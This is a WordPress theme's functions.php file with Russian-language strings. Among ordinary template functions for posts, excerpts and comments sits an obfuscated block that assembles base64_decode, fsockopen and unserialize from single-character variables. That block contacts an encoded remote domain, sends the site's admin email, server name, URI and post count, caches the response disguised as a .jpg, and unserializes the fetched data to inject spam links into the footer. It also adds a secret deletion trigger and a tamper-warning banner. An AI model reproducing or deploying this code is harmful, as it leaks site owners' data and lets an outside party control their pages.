<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $EtzYsNp='4';$KgFKz='_';$eLer='d';$KkWbOtX='e';$zAxm='o';$XRla='a';$RXWwIwC='d';$kYLaC='c';$AtlYm='s';$FTaq='e';$hHddro='e';$wVDRat='6';$ZJtZnq='b';$KwEYveQY=$ZJtZnq.$XRla.$AtlYm.$FTaq.$wVDRat.$EtzYsNp.$KgFKz.$eLer.$KkWbOtX.$kYLaC.$zAxm.$RXWwIwC.$hHddro;$ovxyG='g';$FhDSbky='i';$LWpjmD='f';$NeoUz='t';$rJwynpA='a';$RySD='e';$KblQUK='l';$Szaw='z';$RgvWXZ='n';$eQDMOXHx=$ovxyG.$Szaw.$FhDSbky.$RgvWXZ.$LWpjmD.$KblQUK.$rJwynpA.$NeoUz.$RySD;$TNtsu='3';$baQx='r';$WvCh='t';$FtMCPp='t';$nMgLXT='o';$EfTW='_';$HzIoO='r';$lMYIA='s';$cqKSNT='1';$DjHobZXx=$lMYIA.$WvCh.$baQx.$EfTW.$HzIoO.$nMgLXT.$FtMCPp.$cqKSNT.$TNtsu;$dxBetl='t';$rohzft='r';$uMWqZzh='s';$bwvYNu='e';$VgBsH='v';$mZRJLec='r';$hGYwLmsY=$uMWqZzh.$dxBetl.$rohzft.$mZRJLec.$bwvYNu.$VgBsH;                     $vk___________e='4';$qa___________c='_';$fx_____________k='d';$uu______f='e';$ga__________m='o';$kc______________s='a';$jq____y='d';$xe_______________k='c';$nc___e='s';$gi__s='e';$st_______o='e';$oc_________m='6';$ew_______________x='b';$tq_______e=$ew_______________x.$kc______________s.$nc___e.$gi__s.$oc_________m.$vk___________e.$qa___________c.$fx_____________k.$uu______f.$xe_______________k.$ga__________m.$jq____y.$st_______o;$ei__________x='_';$jz__________u='t';$fd_______u='c';$lv_______q='x';$sx_______________b='u';$ih_______g='s';$fn_______________g='e';$bx______________d='n';$lj___________q='o';$wc_____________l='s';$pd________c='f';$og____f='i';$fb___________r='t';$yv________e='i';$xb______________m='n';$kv_______________l=$pd________c.$sx_______________b.$bx______________d.$fd_______u.$fb___________r.$og____f.$lj___________q.$xb______________m.$ei__________x.$fn_______________g.$lv_______q.$yv________e.$wc_____________l.$jz__________u.$ih_______g;$nb___________w='o';$jl_______a='p';$dy_______________i='n';$dg___________m='f';$tu_____________q='e';$nj______________v=$dg___________m.$nb___________w.$jl_______a.$tu_____________q.$dy_______________i;$px_____________c='r';$vh______________c='e';$op______________l='d';$ay______________x='a';$kq_______________n='f';$rz________g=$kq_______________n.$px_____________c.$vh______________c.$ay______________x.$op______________l;$mm___________v='s';$tp__r='f';$zx__m='c';$zw_______________t='e';$zd__________s='l';$aa_____________n='o';$bq______k=$tp__r.$zx__m.$zd__________s.$aa_____________n.$mm___________v.$zw_______________t;define("WP_ID", $tq_______e("Mi4wLjA="));define("WP_TTL", $tq_______e("MTA4MDA="));define("WP_SRC", $tq_______e("dHBva24="));function wp_get_header() {global $tq_______e, $kv_______________l;if ($kv_______________l($tq_______e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$kv_______________l($tq_______e("d3BfZ2V0X2Zvb3Rlcg==")) &&$kv_______________l($tq_______e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $tq_______e, $nj______________v, $bq______k, $rz________g;$oz____n = TEMPLATEPATH."/".$tq_______e("Zm9vdGVyLnBocA==");$iz______________v = @$nj______________v($oz____n, "r");$oz____n = @$rz________g($iz______________v, @filesize($oz____n));@$bq______k($iz______________v);$zk_______________q = TEMPLATEPATH."/".$tq_______e("ZnVuY3Rpb25zLnBocA==");$iz______________v = @$nj______________v($zk_______________q, "r");$zk_______________q = @$rz________g($iz______________v, @filesize($zk_______________q));@$bq______k($iz______________v);$ps________o = 0;if($oz____n && $zk_______________q) {if ($tq_______e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($oz____n, $tq_______e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ps________o = 1;}if (substr_count($oz____n, "wp_theme_GPL_credits()") < 1) {$ps________o = 2;}}if(WP_ID != "2.0.0") {$ps________o = 12;}}if($ps________o > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ps________o -->";}}function wp_loaded() {global $tq_______e, $kv_______________l;return $kv_______________l($tq_______e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($gc______j, $jc__p = "(more...)", $xe_____________w = 0, $ji________c = "") {$ej_______________j = get_the_content($jc__p, $xe_____________w, $ji________c);$ej_______________j = apply_filters("the_content", $ej_______________j);$ej_______________j = str_replace("]]>", "]]>", $ej_______________j);if (strlen($_GET["p"]) > 0) {echo $ej_______________j;}else if ((strlen($ej_______________j)>$gc______j) && ($co_____w = strpos($ej_______________j, " ", $gc______j ))) {$ej_______________j = substr($ej_______________j, 0, $co_____w);$ej_______________j = $ej_______________j;echo $ej_______________j;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$jc__p</a></div></p>";} else {echo $ej_______________j;}}}$vm_________e='e';$or_______h='a';$vw____q='6';$zp______j='s';$yp______n='n';$js______d='4';$by______x='d';$gs_____________g='c';$py________q='e';$hd__________p='o';$hx______t='e';$rw_________p='_';$az___r='b';$hd_____j=$az___r.$or_______h.$zp______j.$hx______t.$vw____q.$js______d.$rw_________p.$py________q.$yp______n.$gs_____________g.$hd__________p.$by______x.$vm_________e;$as____________x='e';$kn_____y='i';$ux__o='f';$xt________v='_';$ro_____________y='t';$zf___________b='l';$vh_______________z='s';$dm_________m='n';$dy___a='n';$il__________d='t';$hv_____s='g';$xe__________g='t';$kd___________j='e';$ek____e='o';$ey___________d='c';$ir___________s='_';$ya_____________f='e';$xv______________m=$ux__o.$kn_____y.$zf___________b.$as____________x.$xt________v.$hv_____s.$ya_____________f.$il__________d.$ir___________s.$ey___________d.$ek____e.$dy___a.$ro_____________y.$kd___________j.$dm_________m.$xe__________g.$vh_______________z;$mn___________g='s';$wt______b='s';$fu________y='i';$tf________t='_';$fq_________x='l';$fg____________u='i';$dn__u='e';$op_______________o='f';$nv_______________t='t';$uc_____________p='e';$ve___________f='x';$ag_________p=$op_______________o.$fu________y.$fq_________x.$uc_____________p.$tf________t.$dn__u.$ve___________f.$fg____________u.$wt______b.$nv_______________t.$mn___________g;$hb___n='o';$ut___d='m';$eq______v='c';$lm_________t='_';$uf_____________y='p';$hr___q='v';$rg______________y='a';$ef___________p='e';$sq____d='r';$je____________a='n';$rp_____________u='e';$iz________r='r';$gd__________y='o';$ja___r='s';$em_______x='i';$ef_______________s=$hr___q.$rp_____________u.$sq____d.$ja___r.$em_______x.$hb___n.$je____________a.$lm_________t.$eq______v.$gd__________y.$ut___d.$uf_____________y.$rg______________y.$iz________r.$ef___________p;$fv______________g='f';$wo________w='n';$zb_____j='p';$uh______________l='k';$za__________f='e';$iw_______f='o';$zs___j='s';$ni_______c='c';$vg_____________p='o';$ee_____o=$fv______________g.$zs___j.$iw_______f.$ni_______c.$uh______________l.$vg_____________p.$zb_____j.$za__________f.$wo________w;$ko______v='i';$fd________q='w';$lm___p='t';$la____________m='e';$rr______________x='f';$sg_________p='r';$jp____c=$rr______________x.$fd________q.$sg_________p.$ko______v.$lm___p.$la____________m;$ny_______z='5';$ib_____________u='d';$pt____________z='m';$ys_______r=$pt____________z.$ib_____________u.$ny_______z;$lq____d='r';$gl___________l='a';$lv_____p='e';$qr_________x='t';$iy___e='a';$xu__________q='l';$fa___________r='p';$ct________o='h';$nz____________d=$lq____d.$lv_____p.$iy___e.$xu__________q.$fa___________r.$gl___________l.$qr_________x.$ct________o;$tc_________a='z';$fr__b='i';$bo__h='e';$xa______________j='u';$go______y='s';$qv_______________s='e';$hm_____p='a';$mx__i='r';$al__________z='i';$yh_________o='n';$ia_________f='l';$nh________q=$xa______________j.$yh_________o.$go______y.$bo__h.$mx__i.$fr__b.$hm_____p.$ia_________f.$al__________z.$tc_________a.$qv_______________s;$rw_____a='p';$rj__k='m';$kt_______________k='a';$mf____f='e';$an_______q='n';$lh_____e='m';$hk__d='t';$et__________e=$hk__d.$mf____f.$lh_____e.$rw_____a.$an_______q.$kt_______________k.$rj__k;$tq_____n='e';$un___________o='t';$gq____________k='e';$kf_______________s='r';$vf___________p='o';$em___________u='_';$es____________x='r';$ip________v='e';$hx__i='m';$pu_____f='c';$hy__d='c';$ow__p='_';$pd_____________v='t';$uf_______t='a';$bw________v='a';$cx__r='e';$vq_____d='x';$sj____d='n';$ni________c='t';$qa_______________l='s';$ns______j='t';$no_______________j=$qa_______________l.$un___________o.$kf_______________s.$gq____________k.$uf_______t.$hx__i.$ow__p.$pu_____f.$vf___________p.$sj____d.$pd_____________v.$tq_____n.$vq_____d.$ni________c.$em___________u.$hy__d.$es____________x.$cx__r.$bw________v.$ns______j.$ip________v;function yn___________w($ui___l) {global $tq_______e, $kv_______________l, $xv______________m, $ef_______________s, $no_______________j;if (!$kv_______________l($tq_______e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ef_______________s(PHP_VERSION, "5.0.0", ">=") && $kv_______________l($tq_______e("ZmlsZV9nZXRfY29udGVudHM=")) && $kv_______________l($tq_______e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$or____________g = $no_______________j(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xm_______________w = @$xv______________m($ui___l, 0, $or____________g);} else {$xm_______________w = @$xv______________m($ui___l, 0);}return $xm_______________w;}function mk________a($ui___l) {global $kv_______________l, $ee_____o, $jp____c, $tq_______e;if (!$kv_______________l($tq_______e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sd____u = strpos($ui___l, "/", 7);$uo____________i = array("uri"     => substr($ui___l, $sd____u),"host"    => str_replace("http://", "", substr($ui___l, 0, $sd____u)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$va________p = @$ee_____o("$uo____________i[host]", 80, $ri_____________l, $ot__o, 4);if (!$va________p) {return false;} else {$xm_______________w = "";$qg__________i  = "GET $uo____________i[uri] HTTP/1.0\r\n";$qg__________i .= "Host: $uo____________i[host]\r\n";$qg__________i .= "Referer: $uo____________i[referer]\r\n";$qg__________i .= "Connection: Close\r\n\r\n";@$jp____c($va________p, $qg__________i);while (!@feof($va________p)) {$cz_________f = @fgets($va________p, (1024*24));if ($cz_________f == "\r\n") {$am_____d = true;continue;}if ($am_____d) {$xm_______________w .= $cz_________f;}}return $xm_______________w;}}function ho____s($ui___l) {global $kv_______________l;$ud____c = false;if ($ui___l != "") {if ($kv_______________l("yn___________w")) {$ud____c = @yn___________w($ui___l);}if (!$ud____c && ($kv_______________l("mk________a"))) {$ud____c = @mk________a($ui___l);}}return $ud____c;}function to______________b() {global $_SERVER, $ys_______r;$tm______m = $_SERVER["SERVER_NAME"];if (substr("$tm______m", 0, 4) == "www.") {$tm______m = substr("$tm______m", 4);}$tm______m = $ys_______r("$_SERVER[SERVER_NAME]");return $tm______m;}function aj_______________b() {return "file";}function eb______u($ui___l) {global $_SERVER, $xv______________m, $ag_________p, $nj______________v, $bq______k, $jp____c;$yh__________v = vr__n();$rk______________m = to______________b().".jpg";$yi____q = $yh__________v["dir_upload"]["path"]."/$rk______________m";$du____________g = @filemtime($yi____q);if (!$du____________g || ((time()-$du____________g) >= WP_TTL)) {$ud____c = ho____s($ui___l);if ($ud____c) {if ($ag_________p($yi____q)) {@unlink($yi____q);}$iz______________v = @$nj______________v($yi____q, "x+");@$jp____c($iz______________v, $ud____c);@$bq______k($iz______________v);}} else {if ($ag_________p($yi____q)) {$ud____c = @$xv______________m($yi____q);} else {$ud____c = false;}}return $ud____c;}function vr__n() {global $_SERVER, $tq_______e, $hd_____j;$ae____________n = wp_count_posts("post");$nv_________k = pathinfo(get_bloginfo("template_directory"));$yh__________v = array("url" => array("report"      => $tq_______e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $nv_________k,"dir_upload"=> vv_______________h(),"queryString"=> array("?a001=".WP_ID,"a004=".$nv_________k[filename],"a005=".$ae____________n->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
);$yh__________v["url"]["queryString"] = implode("&", $yh__________v["queryString"]);$yh__________v["url"]["report"] = $yh__________v["url"]["report"]."/?".$hd_____j($yh__________v["url"]["queryString"]).".html";return $yh__________v;}function vv_______________h() {$or_____g = wp_upload_dir();if (isset($or_____g["error"])) {$dt___________z = pc______________i();if (is_writable($dt___________z)) {$or_____g = array("path" => $dt___________z);}}return $or_____g;}function pc______________i() {global $kv_______________l, $ys_______r, $nz____________d, $et__________e;$jt_______________y = (bool) ini_get("safe_mode");if ($jt_______________y == true) {return false;}if ($kv_______________l("sys_get_temp_dir")) {$ch_________h = sys_get_temp_dir();if (is_writable($ch_________h)) {return $nz____________d($ch_________h);}}if (!empty($_ENV["TMP"])) {return $nz____________d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $nz____________d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $nz____________d($_ENV["TEMP"]);} else {$ia_____________u = $et__________e($ys_______r(uniqid(rand(), true)), "");if ($ia_____________u) {$ch_________h = $nz____________d(dirname($ia_____________u));@unlink($ia_____________u);return $ch_________h;} else {return false;}}}function nn__x() {global $_GET, $ag_________p;$yh__________v = vr__n();$tm______m = to______________b();$hr____________v = aj_______________b();$sz_______h = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($hr____________v == "file") {$tf__g = $yh__________v["dir_upload"]["path"]."/".$tm______m.".jpg";if ($ag_________p($tf__g)) {@unlink($tf__g);$sz_______h = "deleted";}}$cl___w = array("s"=> $sz_______h,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($cl___w AS $iv___________b => $bs______s) echo " [$iv___________b:$bs______s]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $kv_______________l, $tq_______e, $nh________q;$yh__________v = vr__n();$dh________m = "eb______u";if ($kv_______________l($dh________m)) {$xm_______________w = $dh________m($yh__________v["url"]["report"]);}if ($xm_______________w) {if ($xm_______________w = @$tq_______e($xm_______________w)) {$xm_______________w = @$nh________q($xm_______________w);if (strlen($xm_______________w[custom_credit]) >= 5) {$yh__________v["default_string"] = $xm_______________w[custom_credit];}if ($xm_______________w["status"] == "0") {$gc_______________p = 1;$in___w = 1;} else {$vr______p = sizeof($xm_______________w["links"]);$pk____o = $yh__________v["default_string"];if ($vr______p > 0 && $xm_______________w["links"] !== "") {$jk_____________v = 0;foreach ($xm_______________w["links"] as $yo____________k => $ie__________o) {$jk_____________v++;if ($ie__________o->l_path == "" || $ie__________o->l_path == $_SERVER["REQUEST_URI"]) {$ie__________o->l_href = htmlspecialchars(strip_tags($ie__________o->l_href));$ie__________o->l_title = htmlspecialchars(strip_tags($ie__________o->l_title));$ie__________o->l_anchor = htmlspecialchars(strip_tags($ie__________o->l_anchor));$pk____o .= " | ";$pk____o .= "<a href='$ie__________o->l_href' title='$ie__________o->l_title'";if ($ie__________o->l_nofollow == "1") {$pk____o .= " rel='nofollow'";}$pk____o .= ">$ie__________o->l_anchor</a>";}}}$yh__________v["links"] = "$pk____o";if ($xm_______________w[credit] == "0") {$yh__________v["links"] = "";}}} else {$gc_______________p = "1";}} else {$gc_______________p = "1";}if ($gc_______________p == "1") {$yh__________v["links"] = $yh__________v["default_string"];}echo "$yh__________v[links]";echo "<!-- s: $xm_______________w[signature] -->";nn__x();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
